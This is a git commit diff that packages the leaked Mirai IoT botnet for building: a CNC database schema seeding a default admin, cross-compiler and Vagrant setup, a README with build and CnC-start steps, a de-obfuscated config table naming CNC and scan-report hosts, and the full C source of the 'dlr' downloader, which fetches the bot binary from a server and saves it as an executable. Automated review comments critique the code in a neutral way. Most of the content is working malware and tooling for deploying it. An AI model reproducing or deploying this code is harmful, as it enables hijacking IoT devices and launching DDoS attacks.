Merge c8381aa219
into 22e18df02e
commit
5a83eec32b
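--- a/Configuring_CNC_Database.txt
+++ b/Configuring_CNC_Database.txt
@@ -0,0 +1,41 @@
+DROP DATABASE IF EXISTS mirai;
+CREATE DATABASE mirai;
+USE mirai;
+
+CREATE TABLE `history` (
+`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
+`user_id` int(10) unsigned NOT NULL,
+`time_sent` int(10) unsigned NOT NULL,
+`duration` int(10) unsigned NOT NULL,
+`command` text NOT NULL,
+`max_bots` int(11) DEFAULT '-1',
+PRIMARY KEY (`id`),
+KEY `user_id` (`user_id`)
+);
+
+CREATE TABLE `users` (
+`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
+`username` varchar(32) NOT NULL,
+`password` varchar(32) NOT NULL,
+`duration_limit` int(10) unsigned DEFAULT NULL,
+`cooldown` int(10) unsigned NOT NULL,
+`wrc` int(10) unsigned DEFAULT NULL,
+`last_paid` int(10) unsigned NOT NULL,
+`max_bots` int(11) DEFAULT '-1',
+`admin` int(10) unsigned DEFAULT '0',
+`intvl` int(10) unsigned DEFAULT '30',
+`api_key` text,
+PRIMARY KEY (`id`),
+KEY `username` (`username`)
+);
+
+CREATE TABLE `whitelist` (
+`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
+`prefix` varchar(16) DEFAULT NULL,
+`netmask` tinyint(3) unsigned DEFAULT NULL,
+PRIMARY KEY (`id`),
+KEY `prefix` (`prefix`)
+);
+
+INSERT INTO users (username, password, duration_limit, cooldown, wrc, last_paid, max_bots, admin, api_key)\
+VALUES ( 'user', 'password',100, 0, 0, 0, 100, 1, 'foobar');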
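Review bot: The `users` table declares `password` as a plain `varchar(32)` and the closing `INSERT` seeds a row with `admin` = 1, the literal credentials `'user'` / `'password'` and `api_key` `'foobar'`, so every database created from this file starts with the same cleartext administrator account. Nothing in the file says so, and `DROP DATABASE IF EXISTS mirai;` on the first line silently discards whatever was there before. A comment above the `INSERT` would make both facts visible to anyone reading the schema, for example `-- seed row: fixed default admin (user/password, api_key foobar); credentials are stored unhashed`. `history.user_id` is indexed but has no `FOREIGN KEY` to `users.id`, so orphaned history rows are possible.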
42
README.md
Executable file → Normal file
42
README.md
Executable file → Normal file
|
@ -1,3 +1,45 @@
|
|||
# Mirai Botnet Client, Echo Loader and CNC source code
|
||||
|
||||
This is the source code released from [here](http://hackforums.net/showthread.php?tid=5420472) as discussed in this [Brian Krebs Post](https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/).
|
||||
|
||||
I found
|
||||
|
||||
mirai.src.zip from [VT](https://www.virustotal.com/en/file/68d01cd712da9c5f889ce774ae7ad41cd6fbc13c42864aa593b60c1f6a7cef63/analysis/)
|
||||
|
||||
loader.src.zip from [VT](https://www.virustotal.com/en/file/fffad2fbd1fa187a748f6d2009b942d4935878d2c062895cde53e71d125b735e/analysis/)
|
||||
|
||||
dlr.src.zip from [VT](https://www.virustotal.com/en/file/519d4e3f9bc80893838f94fd0365d587469f9468b4fa2ff0fb0c8f7e8fb99429/analysis/)
|
||||
|
||||
Maybe they are original files.
|
||||
|
||||
|
||||
|
||||
Configuring_CNC_Database.txt from [pastebin.com/86d0iL9g](http://pastebin.com/86d0iL9g)
|
||||
|
||||
Setting_Up_Cross_Compilers.sh from [pastebin.com/1rRCc3aD](http://pastebin.com/1rRCc3aD)
|
||||
|
||||
Felicitychou
|
||||
|
||||
Chuck:
|
||||
Merged Felicitychou's additions and setup Vagrant file.
|
||||
To setup build environment, you just need to "vagrant up"
|
||||
Also removed obfuscation of table.c, so no need to run "enc" tool anymore
|
||||
Have modified some shell scripts to install more cross compiler packages and remove errors
|
||||
modified build.sh to download go packages
|
||||
|
||||
|
||||
steps to setup build environment
|
||||
- git pull
|
||||
- vagrant up
|
||||
- vagrant ssh
|
||||
- cd /vagrant/mirai
|
||||
- ./build.sh
|
||||
|
||||
Steps to create database:
|
||||
`cat Configure_CNC_Database.txt | mysql -u root --password=password`
|
||||
|
||||
Start the CnC
|
||||
- make a prompt file in ./release
|
||||
- `cd ./release`
|
||||
- `sudo ./cnc`
|
||||
|
||||
|
|
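--- a/Setting_Up_Cross_Compilers.sh
+++ b/Setting_Up_Cross_Compilers.sh
@@ -0,0 +1,68 @@
+#!/bin/bash
+# RUN ALL OF THESE AS A PRIVELEGED USER, SINCE WE ARE DOWNLOADING INTO /etc
+
+apt-get install -y gcc golang electric-fence
+
+if [ ! -d "/etc/xcompile" ]; then
+pushd .
+mkdir /etc/xcompile
+cd /etc/xcompile
+
+echo "downloading cross compilers"
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
+
+echo "unpacking cross compilers"
+tar -jxf cross-compiler-armv4l.tar.bz2
+tar -jxf cross-compiler-armv5l.tar.bz2
+tar -jxf cross-compiler-i586.tar.bz2
+tar -jxf cross-compiler-m68k.tar.bz2
+tar -jxf cross-compiler-mips.tar.bz2
+tar -jxf cross-compiler-mipsel.tar.bz2
+tar -jxf cross-compiler-powerpc.tar.bz2
+tar -jxf cross-compiler-sh4.tar.bz2
+tar -jxf cross-compiler-sparc.tar.bz2
+
+echo "deleting cross compilers"
+rm *.tar.bz2
+mv cross-compiler-armv4l armv4l
+mv cross-compiler-armv5l armv5l
+mv cross-compiler-i586 i586
+mv cross-compiler-m68k m68k
+mv cross-compiler-mips mips
+mv cross-compiler-mipsel mipsel
+mv cross-compiler-powerpc powerpc
+mv cross-compiler-sh4 sh4
+mv cross-compiler-sparc sparc
+
+popd
+fi
+
+
+# PUT THESE COMMANDS IN THE FILE ~/.bashrc
+
+# Cross compiler toolchains
+echo 'adding compiler toolchains to $PATH'
+echo '
+export PATH=$PATH:/etc/xcompile/armv4l/bin
+export PATH=$PATH:/etc/xcompile/armv5l/bin
+export PATH=$PATH:/etc/xcompile/i586/bin
+export PATH=$PATH:/etc/xcompile/m68k/bin
+export PATH=$PATH:/etc/xcompile/mips/bin
+export PATH=$PATH:/etc/xcompile/mipsel/bin
+export PATH=$PATH:/etc/xcompile/powerpc/bin
+export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
+export PATH=$PATH:/etc/xcompile/sh4/bin
+export PATH=$PATH:/etc/xcompile/sparc/bin
+
+# Golang
+export PATH=$PATH:/usr/local/go/bin
+export GOPATH=$HOME/Documents/go
+' >> /etc/bash.bashrc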
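Review bot: The nine `wget --quiet` downloads are unpacked as root under `/etc/xcompile` with no integrity check and no exit-status check, so a truncated or substituted archive goes straight into `tar -jxf` and the resulting binaries end up on the system-wide `PATH`. Starting the script with `set -euo pipefail` and verifying a pinned digest before each unpack, e.g. `echo "<EXPECTED_SHA256>  cross-compiler-armv4l.tar.bz2" | sha256sum -c -`, would stop it at the first bad file. The final `echo ' … ' >> /etc/bash.bashrc` sits outside the `if [ ! -d "/etc/xcompile" ]` block, so every run appends the same exports to the global bashrc again. It also adds `/etc/xcompile/powerpc-440fp/bin`, a directory that no download or `mv` in this script creates.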
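--- a/Vagrantfile
+++ b/Vagrantfile
@@ -0,0 +1,26 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# This vagrant sets up build environment for mirai botnet
+Vagrant.configure("2") do |config|
+# The most common configuration options are documented and commented below.
+# For a complete reference, please see the online documentation at
+# https://docs.vagrantup.com.
+
+# Every Vagrant development environment requires a box. You can search for
+# boxes at https://atlas.hashicorp.com/search.
+config.vm.box = "ubuntu/trusty64"
+
+# Enable provisioning with a shell script. Additional provisioners such as
+# Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+# documentation for more information about their specific syntax and use.
+config.vm.provision "shell", inline: <<-SHELL
+debconf-set-selections <<< 'mysql-server mysql-server/root_password password password'
+debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password password'
+apt-get update
+apt-get upgrade -y
+apt-get install -y mysql-server mysql-client golang gcc electric-fence git
+chmod +x /vagrant/Setting_Up_Cross_Compilers.sh
+/vagrant/Setting_Up_Cross_Compilers.sh
+SHELL
+end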
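Review bot: The provisioner pins the MySQL root password to the literal `password` through the two `debconf-set-selections` lines, and `config.vm.box = "ubuntu/trusty64"` selects a 14.04 image, a release that has since left standard support, so the guest is weakly defended as soon as it comes up. The file contains no `config.vm.network` line, so the provider's default networking decides what the guest can reach once provisioning has finished. A comment above the provision block should state both points, for example `# root DB password is a fixed default; keep this guest on a host-only/isolated network after provisioning`.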
BIN
dlr.src.zip
Normal file
BIN
dlr.src.zip
Normal file
Binary file not shown.
22
dlr/build.sh
Normal file
22
dlr/build.sh
Normal file
|
@ -0,0 +1,22 @@
|
|||
armv4l-gcc -Os -D BOT_ARCH=\"arm\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm
|
||||
armv6l-gcc -Os -D BOT_ARCH=\"arm7\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm7
|
||||
i686-gcc -Os -D BOT_ARCH=\"x86\" -D X32 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.x86
|
||||
m68k-gcc -Os -D BOT_ARCH=\"m68k\" -D M68K -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.m68k
|
||||
mips-gcc -Os -D BOT_ARCH=\"mips\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mips
|
||||
#mips64-gcc -Os -D BOT_ARCH=\"mps64\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mps64
|
||||
mipsel-gcc -Os -D BOT_ARCH=\"mpsl\" -D MIPSEL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mpsl
|
||||
powerpc-gcc -Os -D BOT_ARCH=\"ppc\" -D PPC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.ppc
|
||||
sh4-gcc -Os -D BOT_ARCH=\"sh4\" -D SH4 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh4
|
||||
#sh2elf-gcc -Os -D BOT_ARCH=\"sh2el\" -D SH2EL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2el
|
||||
#sh2eb-gcc -Os -D BOT_ARCH=\"sh2eb\" -D SH2EB -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2eb
|
||||
sparc-gcc -Os -D BOT_ARCH=\"spc\" -D SPARC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.spc
|
||||
|
||||
armv4l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm
|
||||
armv6l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm7
|
||||
i686-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.x86
|
||||
m68k-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.m68k
|
||||
mips-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mips
|
||||
mipsel-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mpsl
|
||||
powerpc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.ppc
|
||||
sh4-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.sh4
|
||||
sparc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.spc
|
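Review bot: The script writes its output to `./release/dlr.*`, and the same commit also checks in `dlr/release/dlr.arm` through `dlr.spc` as binary files, so the committed artefacts cannot be tied to `main.c` from the diff alone. The `*-strip` lines remove `.comment`, `.note.gnu.build-id` and the other note sections, which is the metadata normally used to match a binary to a toolchain and a build. A header comment should say that the files in `release/` are generated output and not reviewed input, e.g. `# release/dlr.* are produced by this script; treat the committed copies as unverified`.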
274
dlr/main.c
Normal file
274
dlr/main.c
Normal file
|
@ -0,0 +1,274 @@
|
|||
#include <sys/types.h>
|
||||
//#include <bits/syscalls.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
|
||||
#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP
|
||||
|
||||
#define EXEC_MSG "MIRAI\n"
|
||||
#define EXEC_MSG_LEN 6
|
||||
|
||||
#define DOWNLOAD_MSG "FIN\n"
|
||||
#define DOWNLOAD_MSG_LEN 4
|
||||
|
||||
#define STDIN 0
|
||||
#define STDOUT 1
|
||||
#define STDERR 2
|
||||
|
||||
#if BYTE_ORDER == BIG_ENDIAN
|
||||
#define HTONS(n) (n)
|
||||
#define HTONL(n) (n)
|
||||
#elif BYTE_ORDER == LITTLE_ENDIAN
|
||||
#define HTONS(n) (((((unsigned short)(n) & 0xff)) << 8) | (((unsigned short)(n) & 0xff00) >> 8))
|
||||
#define HTONL(n) (((((unsigned long)(n) & 0xff)) << 24) | \
|
||||
((((unsigned long)(n) & 0xff00)) << 8) | \
|
||||
((((unsigned long)(n) & 0xff0000)) >> 8) | \
|
||||
((((unsigned long)(n) & 0xff000000)) >> 24))
|
||||
#else
|
||||
#error "Fix byteorder"
|
||||
#endif
|
||||
|
||||
#ifdef __ARM_EABI__
|
||||
#define SCN(n) ((n) & 0xfffff)
|
||||
#else
|
||||
#define SCN(n) (n)
|
||||
#endif
|
||||
|
||||
inline void run(void);
|
||||
int sstrlen(char *);
|
||||
unsigned int utils_inet_addr(unsigned char, unsigned char, unsigned char, unsigned char);
|
||||
|
||||
/* stdlib calls */
|
||||
int xsocket(int, int, int);
|
||||
int xwrite(int, void *, int);
|
||||
int xread(int, void *, int);
|
||||
int xconnect(int, struct sockaddr_in *, int);
|
||||
int xopen(char *, int, int);
|
||||
int xclose(int);
|
||||
void x__exit(int);
|
||||
|
||||
#define socket xsocket
|
||||
#define write xwrite
|
||||
#define read xread
|
||||
#define connect xconnect
|
||||
#define open xopen
|
||||
#define close xclose
|
||||
#define __exit x__exit
|
||||
|
||||
#ifdef DEBUG
|
||||
/*
|
||||
void xprintf(char *str)
|
||||
{
|
||||
write(1, str, sstrlen(str));
|
||||
}
|
||||
#define printf xprintf
|
||||
*/
|
||||
#endif
|
||||
|
||||
void __start(void)
|
||||
{
|
||||
#if defined(MIPS) || defined(MIPSEL)
|
||||
__asm(
|
||||
".set noreorder\n"
|
||||
"move $0, $31\n"
|
||||
"bal 10f\n"
|
||||
"nop\n"
|
||||
"10:\n.cpload $31\n"
|
||||
"move $31, $0\n"
|
||||
".set reorder\n"
|
||||
);
|
||||
#endif
|
||||
run();
|
||||
}
|
||||
|
||||
inline void run(void)
|
||||
{
|
||||
char recvbuf[128];
|
||||
struct sockaddr_in addr;
|
||||
int sfd, ffd, ret;
|
||||
unsigned int header_parser = 0;
|
||||
int arch_strlen = sstrlen(BOT_ARCH);
|
||||
|
||||
write(STDOUT, EXEC_MSG, EXEC_MSG_LEN);
|
||||
|
||||
addr.sin_family = AF_INET;
|
||||
addr.sin_port = HTONS(80);
|
||||
addr.sin_addr.s_addr = HTTP_SERVER;
|
||||
|
||||
ffd = open("dvrHelper", O_WRONLY | O_CREAT | O_TRUNC, 0777);
|
||||
|
||||
sfd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
|
||||
#ifdef DEBUG
|
||||
if (ffd == -1)
|
||||
printf("Failed to open file!\n");
|
||||
if (sfd == -1)
|
||||
printf("Failed to call socket()\n");
|
||||
#endif
|
||||
|
||||
if (sfd == -1 || ffd == -1)
|
||||
__exit(1);
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("Connecting to host...\n");
|
||||
#endif
|
||||
|
||||
if ((ret = connect(sfd, &addr, sizeof (struct sockaddr_in))) < 0)
|
||||
{
|
||||
#ifdef DEBUG
|
||||
printf("Failed to connect to host.\n");
|
||||
#endif
|
||||
write(STDOUT, "NIF\n", 4);
|
||||
__exit(-ret);
|
||||
}
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("Connected to host\n");
|
||||
#endif
|
||||
|
||||
if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))
|
||||
{
|
||||
#ifdef DEBUG
|
||||
printf("Failed to send get request.\n");
|
||||
#endif
|
||||
|
||||
__exit(3);
|
||||
}
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("Started header parse...\n");
|
||||
#endif
|
||||
|
||||
while (header_parser != 0x0d0a0d0a)
|
||||
{
|
||||
char ch;
|
||||
int ret = read(sfd, &ch, 1);
|
||||
|
||||
if (ret != 1)
|
||||
__exit(4);
|
||||
header_parser = (header_parser << 8) | ch;
|
||||
}
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("Finished receiving HTTP header\n");
|
||||
#endif
|
||||
|
||||
while (1)
|
||||
{
|
||||
int ret = read(sfd, recvbuf, sizeof (recvbuf));
|
||||
|
||||
if (ret <= 0)
|
||||
break;
|
||||
write(ffd, recvbuf, ret);
|
||||
}
|
||||
|
||||
close(sfd);
|
||||
close(ffd);
|
||||
write(STDOUT, DOWNLOAD_MSG, DOWNLOAD_MSG_LEN);
|
||||
__exit(5);
|
||||
}
|
||||
|
||||
int sstrlen(char *str)
|
||||
{
|
||||
int c = 0;
|
||||
|
||||
while (*str++ != 0)
|
||||
c++;
|
||||
return c;
|
||||
}
|
||||
|
||||
unsigned int utils_inet_addr(unsigned char one, unsigned char two, unsigned char three, unsigned char four)
|
||||
{
|
||||
unsigned long ip = 0;
|
||||
|
||||
ip |= (one << 24);
|
||||
ip |= (two << 16);
|
||||
ip |= (three << 8);
|
||||
ip |= (four << 0);
|
||||
return HTONL(ip);
|
||||
}
|
||||
|
||||
int xsocket(int domain, int type, int protocol)
|
||||
{
|
||||
#if defined(__NR_socketcall)
|
||||
#ifdef DEBUG
|
||||
printf("socket using socketcall\n");
|
||||
#endif
|
||||
struct {
|
||||
int domain, type, protocol;
|
||||
} socketcall;
|
||||
socketcall.domain = domain;
|
||||
socketcall.type = type;
|
||||
socketcall.protocol = protocol;
|
||||
|
||||
// 1 == SYS_SOCKET
|
||||
int ret = syscall(SCN(SYS_socketcall), 1, &socketcall);
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("socket got ret: %d\n", ret);
|
||||
#endif
|
||||
return ret;
|
||||
#else
|
||||
#ifdef DEBUG
|
||||
printf("socket using socket\n");
|
||||
#endif
|
||||
return syscall(SCN(SYS_socket), domain, type, protocol);
|
||||
#endif
|
||||
}
|
||||
|
||||
int xread(int fd, void *buf, int len)
|
||||
{
|
||||
return syscall(SCN(SYS_read), fd, buf, len);
|
||||
}
|
||||
|
||||
int xwrite(int fd, void *buf, int len)
|
||||
{
|
||||
return syscall(SCN(SYS_write), fd, buf, len);
|
||||
}
|
||||
|
||||
int xconnect(int fd, struct sockaddr_in *addr, int len)
|
||||
{
|
||||
#if defined(__NR_socketcall)
|
||||
#ifdef DEBUG
|
||||
printf("connect using socketcall\n");
|
||||
#endif
|
||||
struct {
|
||||
int fd;
|
||||
struct sockaddr_in *addr;
|
||||
int len;
|
||||
} socketcall;
|
||||
socketcall.fd = fd;
|
||||
socketcall.addr = addr;
|
||||
socketcall.len = len;
|
||||
// 3 == SYS_CONNECT
|
||||
int ret = syscall(SCN(SYS_socketcall), 3, &socketcall);
|
||||
|
||||
#ifdef DEBUG
|
||||
printf("connect got ret: %d\n", ret);
|
||||
#endif
|
||||
|
||||
return ret;
|
||||
#else
|
||||
#ifdef DEBUG
|
||||
printf("connect using connect\n");
|
||||
#endif
|
||||
return syscall(SCN(SYS_connect), fd, addr, len);
|
||||
#endif
|
||||
}
|
||||
|
||||
int xopen(char *path, int flags, int other)
|
||||
{
|
||||
return syscall(SCN(SYS_open), path, flags, other);
|
||||
}
|
||||
|
||||
int xclose(int fd)
|
||||
{
|
||||
return syscall(SCN(SYS_close), fd);
|
||||
}
|
||||
|
||||
void x__exit(int code)
|
||||
{
|
||||
syscall(SCN(SYS_exit), code);
|
||||
}
|
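Review bot: `run()` has no comment describing what it puts on the wire or on disk, which is the first thing an analyst reading this file needs. From the visible lines it writes `MIRAI\n` to stdout, opens `dvrHelper` with `O_WRONLY | O_CREAT | O_TRUNC` and mode `0777`, sends `GET /bins/mirai.<BOT_ARCH> HTTP/1.0` to port 80 of `HTTP_SERVER`, copies everything after the `\r\n\r\n` header terminator into that file, and then writes `FIN\n` (or `NIF\n` when `connect` fails). A block comment above `run()` listing those strings, the file name and mode, and the exit codes 1, 3, 4 and 5 would put the observable artefacts in one place for detection writers. The unexplained literals in the `write()` length, `16 + arch_strlen + 13`, deserve a one-line comment too, because they must stay in step with the request string.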
10
dlr/release/.build
Normal file
10
dlr/release/.build
Normal file
|
@ -0,0 +1,10 @@
|
|||
<proxseas> wtf why would you hit krebs
|
||||
<tpres> Hm, why do you care? Just move C2 or something?
|
||||
<proxseas> no fuck, this is the shit you avoid. fuck off
|
||||
<proxseas> im kicking you off
|
||||
<tpres> Are you fucking me? you better be joking
|
||||
<proxseas> DO YOU HVE ANY IDEE
|
||||
<proxseas> * IDEA
|
||||
<proxseas> WHAT YOUVE DONE
|
||||
<tpres> look man i was just messing around its nbd
|
||||
<proxseas> YOU F UCKING IDIOT
|
BIN
dlr/release/dlr.arm
Normal file
BIN
dlr/release/dlr.arm
Normal file
Binary file not shown.
BIN
dlr/release/dlr.arm7
Normal file
BIN
dlr/release/dlr.arm7
Normal file
Binary file not shown.
BIN
dlr/release/dlr.m68k
Normal file
BIN
dlr/release/dlr.m68k
Normal file
Binary file not shown.
BIN
dlr/release/dlr.mips
Normal file
BIN
dlr/release/dlr.mips
Normal file
Binary file not shown.
BIN
dlr/release/dlr.mpsl
Normal file
BIN
dlr/release/dlr.mpsl
Normal file
Binary file not shown.
BIN
dlr/release/dlr.ppc
Normal file
BIN
dlr/release/dlr.ppc
Normal file
Binary file not shown.
BIN
dlr/release/dlr.sh4
Normal file
BIN
dlr/release/dlr.sh4
Normal file
Binary file not shown.
BIN
dlr/release/dlr.spc
Normal file
BIN
dlr/release/dlr.spc
Normal file
Binary file not shown.
BIN
loader.src.zip
Normal file
BIN
loader.src.zip
Normal file
Binary file not shown.
BIN
mirai.src.zip
Normal file
BIN
mirai.src.zip
Normal file
Binary file not shown.
|
@ -15,64 +15,64 @@ struct table_value table[TABLE_MAX_KEYS];
|
|||
|
||||
void table_init(void)
|
||||
{
|
||||
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
|
||||
add_entry(TABLE_CNC_PORT, "\x22\x35", 2); // 23
|
||||
// removeed obfuscation
|
||||
// use the folowing bash magic to create domain or other things for this hexadecimal escaped nonesense
|
||||
//
|
||||
// $echo example.com | hexdump -e '1/1 "\\\x"' -e '1/1 "%.2x"'
|
||||
// \x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0a
|
||||
// remember to add null byte on end
|
||||
|
||||
add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 29); // report.changeme.com
|
||||
add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2); // 48101
|
||||
add_entry(TABLE_CNC_DOMAIN, "\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x00", 12); //changed to example.com
|
||||
add_entry(TABLE_CNC_PORT, "\x00\x17", 2);
|
||||
add_entry(TABLE_SCAN_CB_DOMAIN, "\x72\x65\x70\x6f\x72\x74\x2e\x63\x68\x61\x6e\x67\x65\x6d\x65\x2e\x63\x6f\x6d\x00", 20);
|
||||
add_entry(TABLE_SCAN_CB_PORT, "\xbb\xe5", 2);
|
||||
add_entry(TABLE_EXEC_SUCCESS, "\x6c\x69\x73\x74\x65\x6e\x69\x6e\x67\x20\x74\x75\x6e\x30\x00", 15);
|
||||
add_entry(TABLE_KILLER_SAFE, "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x79\x6f\x75\x74\x75\x2e\x62\x65\x2f\x64\x51\x77\x34\x77\x39\x57\x67\x58\x63\x51\x00", 29);
|
||||
add_entry(TABLE_KILLER_PROC, "\x2f\x70\x72\x6f\x63\x2f\x00", 7);
|
||||
add_entry(TABLE_KILLER_EXE, "\x2f\x65\x78\x65\x00", 5);
|
||||
add_entry(TABLE_KILLER_DELETED, "\x20\x28\x64\x65\x6c\x65\x74\x65\x64\x29\x00", 11);
|
||||
add_entry(TABLE_KILLER_FD, "\x2f\x66\x64\x00", 4);
|
||||
add_entry(TABLE_KILLER_ANIME, "\x2e\x61\x6e\x69\x6d\x65\x00", 7);
|
||||
add_entry(TABLE_KILLER_STATUS, "\x2f\x73\x74\x61\x74\x75\x73\x00", 8);
|
||||
add_entry(TABLE_MEM_QBOT, "\x52\x45\x50\x4f\x52\x54\x20\x25\x73\x3a\x25\x73\x00", 13);
|
||||
add_entry(TABLE_MEM_QBOT2, "\x48\x54\x54\x50\x46\x4c\x4f\x4f\x44\x00", 10);
|
||||
add_entry(TABLE_MEM_QBOT3, "\x4c\x4f\x4c\x4e\x4f\x47\x54\x46\x4f\x00", 10);
|
||||
add_entry(TABLE_MEM_UPX, "\x5c\x78\x35\x38\x5c\x78\x34\x44\x5c\x78\x34\x45\x5c\x78\x34\x45\x5c\x78\x34\x33\x5c\x78\x35\x30\x5c\x78\x34\x36\x5c\x78\x32\x32\x00", 33);
|
||||
add_entry(TABLE_MEM_ZOLLARD, "\x7a\x6f\x6c\x6c\x61\x72\x64\x00", 8);
|
||||
add_entry(TABLE_MEM_REMAITEN, "\x47\x45\x54\x4c\x4f\x43\x41\x4c\x49\x50\x00", 11);
|
||||
add_entry(TABLE_SCAN_SHELL, "\x73\x68\x65\x6c\x6c\x00", 6);
|
||||
add_entry(TABLE_SCAN_ENABLE, "\x65\x6e\x61\x62\x6c\x65\x00", 7);
|
||||
add_entry(TABLE_SCAN_SYSTEM, "\x73\x79\x73\x74\x65\x6d\x00", 7);
|
||||
add_entry(TABLE_SCAN_SH, "\x73\x68\x00", 3);
|
||||
add_entry(TABLE_SCAN_QUERY, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x4d\x49\x52\x41\x49\x00", 19);
|
||||
